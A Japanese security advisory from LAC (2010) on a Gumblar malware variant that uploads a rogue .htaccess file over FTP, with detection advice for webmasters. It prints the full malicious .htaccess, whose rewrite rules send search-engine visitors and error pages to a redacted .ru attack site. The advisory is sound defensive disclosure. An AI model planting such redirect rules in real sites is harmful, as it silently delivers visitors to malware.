株式会社ラック

トップレベルのセキュリティ技術を駆使した
ITトータルソリューションで、未来をきり拓く

セキュリティ事故発生時はこちら
閉じる

ご相談は予約不要、24時間対応

緊急対応窓口:サイバー救急センター®

セキュリティに係るお客様の緊急事態に際し迅速にお客様をご支援する緊急対応サービスです。
緊急事態が発生したら今すぐ「サイバー救急センター」にご相談ください。

電話で相談する

メールで相談する

サイバー救急センター®のメールアドレス

自分で調べる

ご相談は予約不要、24時間対応

緊急対応窓口:サイバー救急センター®

セキュリティ事故発生時はすぐにご連絡ください

LAC WATCH
2010年03月03日 | 注意喚起

Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認

※本注意喚起は、2009年12月25日【Gumblar(ガンブラー)ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認】の続報です。

株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。現在判明していることは次のような内容です。

攻撃確認日

  • ラックがこの攻撃を最初に認識したのは2010年3月1日です
  • FTP転送のログから、少なくとも2010年1月上旬にはこの攻撃が発生していたと推測しています

【動作概要】

この.htaccessファイルが置かれる影響は、主要検索サイトからのアクセス、および404、403などのエラーがApacheのリダイレクト機能で攻撃サイトに転送されることです。攻撃サイトに転送された後、他のGumblar攻撃と同様に、悪性プログラムの感染被害に遭われることが推測されます。

【従来型Gumblarとの相違点】

従来のGumblar攻撃と異なる点は、次の2点が判明しています。

1.ユーザはJavaScriptの対策だけでは防げない

Firefox + NoScriptの組み合わせでは防げない可能性があり、RequestPolicyなどのリダイレクト対策が可能なアドオンを利用する必要があります。

2.コンテンツファイル監視だけでは気付くことができない

コンテンツファイル自体は改ざんされておらず、さらにブックマーク(お気に入り)やURL直接入力でサイトを表示した場合は影響を受けないため、Webサイト管理者が被害に気付きにくい。

【Webサーバ管理者の対策】

身に覚えのない.htaccessファイルが存在しないかを確認してください。FTP転送ログで.htaccessファイルがアップロードされていないかを確認するのも有効です。

確認されたログのサンプル

FTP
Jan dd hh:mm:ss 2010 1 x.x.x.x 1278 /home/xxxx/.htaccess b _ i r xxxx ftp 0 * c

※ 現在のところ、トップディレクトリに単発でアップロードされていることを確認しています。

アップロードされる「.htaccess」ファイル

# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://********.ru/ [R=301,L]
ErrorDocument 401 http://********.ru/
ErrorDocument 403 http://********.ru/
ErrorDocument 404 http://********.ru/
ErrorDocument 500 http://********.ru/
# /HostRule

follow me on twitter

以上

【本注意喚起に関するお問い合わせ先】
株式会社ラック サイバー救急センター
電話:03-5537-0119 / E-Mail: サイバー救急センターメール

この記事は役に立ちましたか?

はい いいえ

関連記事

LAC WATCH

関連記事をご紹介します

  • Gumblar(ガンブラー)ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認

  • Gumblarおよびその亜種に関する大量の感染事例について

  • 大手有名サイトの閲覧で発生したコンピュータウイルス感染について

サイバーセキュリティに関する
様々な情報をお届けします

メルマガでは、より厳選した情報を
月に2〜3回配信しています
詳しくはこちら

page top